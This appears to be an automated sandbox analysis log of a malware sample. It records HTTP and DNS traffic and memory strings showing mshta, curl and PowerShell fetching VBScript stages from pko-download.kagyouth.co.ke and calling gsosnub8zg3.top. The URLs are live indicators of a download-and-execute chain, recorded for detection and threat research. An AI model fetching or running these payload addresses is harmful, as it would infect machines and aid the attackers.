          Source: global trafficHTTP traffic detected: GET /list_files.php HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /list_files.php HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /js/riodfc.txt HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /js/pmxdhq.txt HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gsosnub8zg3.topConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gsosnub8zg3.topConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /676198543e20a/js/676198543e135.js HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /676198543e20a/676198543e2f1.vbs HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /676198543e20a/676198543e2f3.vbs HTTP/1.1Host: pko-download.kagyouth.co.keUser-Agent: curl/7.83.1Accept: */*
          Source: global trafficHTTP traffic detected: GET /list_files.php HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /list_files.php HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /js/riodfc.txt HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /js/pmxdhq.txt HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gsosnub8zg3.topConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /1.php?s=mints21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gsosnub8zg3.topConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
          Source: global trafficDNS traffic detected: DNS query: pko-download.kagyouth.co.ke
          Source: global trafficDNS traffic detected: DNS query: gsosnub8zg3.top
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
          Source: powershell.exe, 00000011.00000002.2002991318.000001590180F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gsosnub8zg3.top
          Source: powershell.exe, 00000011.00000002.2002991318.000001590180F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gsosnub8zg3.top/1.php?s=mints21
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
          Source: powershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C112CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FA47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPa
          Source: powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.00000159010D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.00000159010FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0F821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
          Source: powershell.exe, 00000011.00000002.2002991318.0000015901A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C11240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
          Source: powershell.exe, 00000011.00000002.2002991318.0000015901A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
          Source: powershell.exe, 00000011.00000002.2002991318.000001590044E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com0
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0F821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 0000000F.00000002.1982995994.0000021C1FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FE35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C11298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F82F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C112CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900615000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159101D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
          Source: powershell.exe, 00000011.00000002.2002991318.0000015901AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000011.00000002.2002991318.0000015901AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000011.00000002.2002991318.0000015901AC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C11240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C112CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159101D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590044E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
          Source: powershell.exe, 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10955000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590113A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FE35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900615000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
          Source: powershell.exe, 0000000F.00000002.1982995994.0000021C1FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C11298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F82F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C112CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159101D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
          Source: mshta.exe, 00000000.00000003.1837722113.0000000002BDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841957476.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1901975042.0000000005990000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1915650487.0000000005D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
          Source: powershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
          Source: wscript.exe, 0000000A.00000002.1914733283.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914318772.0000000002D57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911913220.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, 676198543e2f3.vbs.4.drString found in binary or memory: https://pko-download.kagyouth.co.ke/
          Source: mshta.exe, 00000000.00000003.1838231650.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840152370.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841794584.0000000002B6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/$
          Source: mshta.exe, 00000000.00000003.1826274179.00000000060F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841957476.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1842849425.00000000060BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1842948051.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1826274179.00000000060B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1781949139.0000000002BF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841957476.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833052728.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840527491.00000000060BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs
          Source: mshta.exe, 00000000.00000003.1837722113.0000000002BDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841957476.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs(fF$
          Source: mshta.exe, 00000000.00000002.1841957476.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs.v
          Source: mshta.exe, 00000000.00000003.1829056802.00000000061C1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1829210589.00000000061C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs0A
          Source: mshta.exe, 00000000.00000003.1828083356.0000000006107000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1825820863.00000000060FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1843031818.0000000006108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsLMEM
          Source: mshta.exe, 00000000.00000003.1826274179.00000000060F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1842948051.00000000060FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833052728.00000000060FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsR
          Source: mshta.exe, 00000000.00000002.1842802315.00000000060A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsdownload.kagyouth.co.ke/676198543
          Source: mshta.exe, 00000000.00000002.1841957476.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsfv8G2
          Source: mshta.exe, 00000000.00000002.1842849425.00000000060BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1826274179.00000000060B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840527491.00000000060BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsi
          Source: mshta.exe, 00000000.00000003.1837722113.0000000002BDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841957476.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbss
          Source: mshta.exe, 00000000.00000002.1841957476.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbstv
          Source: curl.exe, 00000004.00000003.1811209809.00000000034D5000.00000004.00000020.00020000.00000000.sdmp, 676198543e2f1[1].vbs.0.drString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs
          Source: curl.exe, 00000004.00000002.1811679068.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs)
          Source: mshta.exe, 00000000.00000003.1826274179.00000000060B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs0
          Source: curl.exe, 00000004.00000002.1811679068.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1811615559.0000000003420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbsWinSta0
          Source: curl.exe, 00000004.00000002.1811679068.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1811615559.0000000003420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbscurl
          Source: mshta.exe, 00000000.00000002.1842826002.00000000060B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbsgg
          Source: curl.exe, 00000004.00000002.1811679068.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbsk
